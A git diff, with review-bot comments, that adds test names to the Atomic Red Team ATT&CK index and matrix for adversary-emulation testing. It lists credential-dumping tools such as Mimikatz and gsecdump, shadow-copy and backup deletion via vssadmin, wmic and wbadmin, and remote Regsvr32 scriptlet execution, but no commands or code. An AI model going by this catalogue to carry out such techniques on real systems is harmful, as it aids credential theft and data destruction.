diff --git a/atomics/index.md b/atomics/index.md index a10f1149..6de2b53b 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -90,7 +90,20 @@ - Atomic Test #4: Disable SELinux - [T1211 Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1211/t1211.md) - [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) -- [T1107 File Deletion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1107/t1107.md) +- [T1107 File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1107/t1107.md) + - Atomic Test #1: Victim configuration + - Atomic Test #2: Delete a single file + - Atomic Test #3: Delete an entire folder + - Atomic Test #4: Overwrite and delete a file with shred + - Atomic Test #5: Victim configuration + - Atomic Test #6: Delete a single file - cmd + - Atomic Test #7: Delete an entire folder - cmd + - Atomic Test #8: Delete a single file - ps + - Atomic Test #9: Delete an entire folder - ps + - Atomic Test #10: Delete VSS - vssadmin + - Atomic Test #11: Delete VSS - wmic + - Atomic Test #12: bcdedit + - Atomic Test #13: wbadmin - [T1006 File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1006/t1006.md) - [T1144 Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1144/t1144.md) - [T1148 HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1148/t1148.md) 
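Review bot: two of the thirteen new T1107 entries carry the same name, "Atomic Test #1: Victim configuration" and "Atomic Test #5: Victim configuration", so a reader of the index cannot tell them apart. From the neighbouring test names (#2-#4 use `shred`, #6-#13 use cmd, PowerShell, vssadmin, wmic, bcdedit and wbadmin) the first looks like the Linux setup step and the second the Windows one; suffix the platform, e.g. `- Atomic Test #1: Victim configuration (Linux)` and `- Atomic Test #5: Victim configuration (Windows)`. Likewise "#12: bcdedit" and "#13: wbadmin" are bare tool names, whereas #10 and #11 follow an `<action> - <tool>` pattern ("Delete VSS - vssadmin"); name #12 and #13 the same way so the index says what each test does, not only which binary it runs.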
@@ -121,7 +134,10 @@ - [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1055/t1055.md) - [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1108/t1108.md) - [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md) -- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md) +- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md) + - Atomic Test #1: Regsvr32 local COM scriptlet execution + - Atomic Test #2: Regsvr32 remote COM scriptlet execution + - Atomic Test #3: Regsvr32 local DLL execution - [T1014 Rootkit](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1014/t1014.md) - [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) - [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1198/t1198.md) 
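Review bot: the rewritten link `tree/master/atomics/t1117/t1117.md` uses a directory-style (`tree/`) URL for a file; GitHub only serves it through a redirect to `blob/master/…`. The same applies to every entry this patch switches from `edit/` to `tree/`. Since index.md sits in `atomics/`, a relative link such as `[T1117 Regsvr32](t1117/t1117.md)` would resolve on forks, branches and offline renderers alike, or at least use `blob/master/` rather than `tree/master/`. Note also that T1117 is listed a second time under the execution heading (the hunk at `@@ -235,7`), so any future change to the three test names has to be applied in both places.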
@@ -199,8 +215,13 @@ - [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1098/t1098.md) - [T1139 Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1139/t1139.md) - Atomic Test #1: xxxx -- [T1110 Brute Force](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1110/t1110.md) -- [T1003 Credential Dumping](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1003/t1003.md) +- [T1110 Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1110/t1110.md) + - Atomic Test #1: Brute Force Credentials +- [T1003 Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1003/t1003.md) + - Atomic Test #1: Powershell Mimikatz + - Atomic Test #2: Gsecdump + - Atomic Test #3: Windows Credential Editor + - Atomic Test #4: Registry dump of SAM, creds, and secrets - [T1081 Credentials in Files](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1081/t1081.md) - [T1214 Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1214/t1214.md) - [T1212 Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1212/t1212.md) 
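Review bot: the unchanged context line just above the T1110 change still reads "Atomic Test #1: xxxx" for T1139 Bash History; that placeholder name should be replaced while this patch is already filling in test names for the surrounding entries. In the added T1003 list, "Powershell Mimikatz" spells the tool differently from the rest of the index, which writes "PowerShell" (e.g. "PowerShell Cmdlet via Windows command prompt", "Compress Data for Exfiltration With PowerShell"); use `- Atomic Test #1: PowerShell Mimikatz` for consistency.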
@@ -235,7 +256,10 @@ - [T1170 Mshta](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1170/t1170.md) - [T1086 PowerShell](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1086/t1086.md) - [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md) -- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md) +- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md) + - Atomic Test #1: Regsvr32 local COM scriptlet execution + - Atomic Test #2: Regsvr32 remote COM scriptlet execution + - Atomic Test #3: Regsvr32 local DLL execution - [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) - [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) - [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1064/t1064.md) @@ -276,7 +300,9 @@ - Atomic Test #1: SourceRecorder via Windows command prompt - Atomic Test #2: PowerShell Cmdlet via Windows command prompt - [T1119 Automated Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1119/t1119.md) -- [T1115 Clipboard Data](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1115/t1115.md) +- [T1115 Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1115/t1115.md) + - Atomic Test #1: Utilize Clipboard to store or execute commands from + - Atomic Test #2: PowerShell - [T1074 Data Staged](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1074/t1074.md) - [T1213 Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1213/t1213.md) - [T1005 Data from Local System](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1005/t1005.md) 
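Review bot: in the T1115 Clipboard Data hunk, "Atomic Test #1: Utilize Clipboard to store or execute commands from" ends mid-phrase, and "Atomic Test #2: PowerShell" names a shell rather than a behaviour, so neither line tells the reader what the test exercises. Follow the `<action> - <tool>` pattern already used for T1107 (#6-#9, "Delete a single file - cmd", "Delete a single file - ps"), for example `- Atomic Test #1: Execute commands from the clipboard - cmd` and `- Atomic Test #2: Execute commands from the clipboard - PowerShell`, and check that the test names in the linked t1115.md match.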
@@ -285,12 +311,18 @@ - [T1114 Email Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1114/t1114.md) - [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1056/t1056.md) - [T1185 Man in the Browser](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1185/t1185.md) -- [T1113 Screen Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1113/t1113.md) +- [T1113 Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1113/t1113.md) + - Atomic Test #1: Screencapture + - Atomic Test #2: Screencapture (silent) + - Atomic Test #3: X Windows Capture + - Atomic Test #4: Import - [T1125 Video Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1125/t1125.md) # exfiltration - [T1020 Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1020/t1020.md) -- [T1002 Data Compressed](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1002/t1002.md) +- [T1002 Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1002/t1002.md) + - Atomic Test #1: Compress Data for Exfiltration With PowerShell + - Atomic Test #2: Compress Data for Exfiltration With Rar - [T1022 Data Encrypted](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1022/t1022.md) - [T1030 Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1030/t1030.md) - [T1048 Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1048/t1048.md) diff --git a/atomics/matrix.md b/atomics/matrix.md index a2f234a6..c5d5c7b3 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md 
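Review bot: the four T1113 Screen Capture test names do not say which platform each one targets. "Screencapture" and "Screencapture (silent)" refer to the macOS `screencapture` utility, "X Windows Capture" to X11 on Linux, and "Import" to ImageMagick's `import`, but none of that is visible in the index; suffix the platform as the T1107 entries already do with their tool names, e.g. `- Atomic Test #1: Screencapture (macOS)` and `- Atomic Test #4: Import (Linux, ImageMagick)`. The two T1002 entries are fine, but they should be checked against the new `atomics/t1002/t1002.md` this patch introduces (its header appears at the end of the diff).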
@@ -1,9 +1,9 @@ | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1189/t1189.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1155/t1155.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1156/t1156.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1134/t1134.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1134/t1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1098/t1098.md) | [Account Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1087/t1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1155/t1155.md) | [Audio Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1123/t1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1020/t1020.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1043/t1043.md) | -| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1190/t1190.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1191/t1191.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1197/t1197.md) | [Bash 
History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1139/t1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1010/t1010.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1017/t1017.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1119/t1119.md) | [Data Compressed](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1002/t1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1092/t1092.md) | -| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1200/t1200.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1059/t1059.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1009/t1009.md) | [Brute Force](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1110/t1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1217/t1217.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1175/t1175.md) | [Clipboard Data](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1115/t1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1022/t1022.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1090/t1090.md) | -| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [Control Panel 
Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1196/t1196.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1088/t1088.md) | [Credential Dumping](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1003/t1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1083/t1083.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1210/t1210.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1074/t1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1030/t1030.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1094/t1094.md) | +| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1190/t1190.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1191/t1191.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1197/t1197.md) | [Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1139/t1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1010/t1010.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1017/t1017.md) | [Automated 
Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1119/t1119.md) | [Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1002/t1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1092/t1092.md) | +| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1200/t1200.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1059/t1059.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1009/t1009.md) | [Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1110/t1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1217/t1217.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1175/t1175.md) | [Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1115/t1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1022/t1022.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1090/t1090.md) | +| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1196/t1196.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [Bypass User Account 
Control](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1088/t1088.md) | [Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1003/t1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1083/t1083.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1210/t1210.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1074/t1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1030/t1030.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1094/t1094.md) | | [Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1193/t1193.md) | [Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1173/t1173.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1138/t1138.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1138/t1138.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1191/t1191.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1081/t1081.md) | [Network Service Scanning](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1046/t1046.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1037/t1037.md) | [Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1213/t1213.md) | [Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1048/t1048.md) | [Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1024/t1024.md) | | 
[Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1192/t1192.md) | [Execution through API](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1106/t1106.md) | [Authentication Package](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1131/t1131.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1088/t1088.md) | [Clear Command History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1146/t1146.md) | [Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1214/t1214.md) | [Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1135/t1135.md) | [Pass the Hash](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1075/t1075.md) | [Data from Local System](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1005/t1005.md) | [Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1041/t1041.md) | [Data Encoding](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1132/t1132.md) | | [Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1194/t1194.md) | [Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1129/t1129.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1197/t1197.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Code Signing](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1116/t1116.md) | [Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1212/t1212.md) | [Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1201/t1201.md) | [Pass 
the Ticket](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1097/t1097.md) | [Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1039/t1039.md) | [Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1011/t1011.md) | [Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1001/t1001.md) | 
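Review bot: nothing in matrix.md explains why some cells link to `edit/master/…` and others to `tree/master/…`; the only visible rule is that the cells switched to `tree/` here (Data Compressed, Brute Force, Clipboard Data, Credential Dumping) are exactly the techniques that gain "Atomic Test" entries in index.md. A user who clicks an `edit/` cell lands in GitHub's file editor, which requires sign-in and offers to create the file, rather than on a page describing the technique. Either document the convention (edit = no tests yet, contribute one; tree = tests exist) at the top of the table or render test-less techniques as plain text. Separately, each `-`/`+` pair rewrites a whole table row to change a single URL; if matrix.md is generated from the per-technique files, say so in the commit message so reviewers can skip the row-level diff.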
@@ -11,13 +11,13 @@ | [Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1199/t1199.md) | [Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1061/t1061.md) | [Browser Extensions](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1176/t1176.md) | [Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1068/t1068.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1122/t1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1069/t1069.md) | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1105/t1105.md) | [Email Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1114/t1114.md) | [Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1029/t1029.md) | [Fallback Channels](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1008/t1008.md) | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1078/t1078.md) | [InstallUtil](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1118/t1118.md) | [Change Default File Association](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1042/t1042.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1196/t1196.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1056/t1056.md) | [Process Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1057/t1057.md) | [Remote 
Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1021/t1021.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1056/t1056.md) | | [Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1104/t1104.md) | | | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1177/t1177.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1109/t1109.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1044/t1044.md) | [DCShadow](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1207/t1207.md) | [Input Prompt](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1141/t1141.md) | [Query Registry](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1012/t1012.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [Man in the Browser](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1185/t1185.md) | | [Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1188/t1188.md) | -| | [Launchctl](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1152/t1152.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1122/t1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1208/t1208.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1018/t1018.md) | [SSH 
Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1184/t1184.md) | [Screen Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1113/t1113.md) | | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1026/t1026.md) | +| | [Launchctl](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1152/t1152.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1122/t1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1208/t1208.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1018/t1018.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1184/t1184.md) | [Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1113/t1113.md) | | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1026/t1026.md) | | | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1168/t1168.md) | [Create Account](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1136/t1136.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1183/t1183.md) | [DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1073/t1073.md) | [Keychain](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1142/t1142.md) | [Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1063/t1063.md) | [Shared 
Webroot](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1051/t1051.md) | [Video Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1125/t1125.md) | | [Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1079/t1079.md) | | | [Mshta](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1170/t1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1160/t1160.md) | [Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1140/t1140.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1171/t1171.md) | [System Information Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1082/t1082.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1080/t1080.md) | | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1205/t1205.md) | | | [PowerShell](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1086/t1086.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1157/t1157.md) | [New Service](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1050/t1050.md) | [Disabling Security Tools](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1089/t1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1040/t1040.md) | [System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1016/t1016.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1072/t1072.md) | | | [Remote Access 
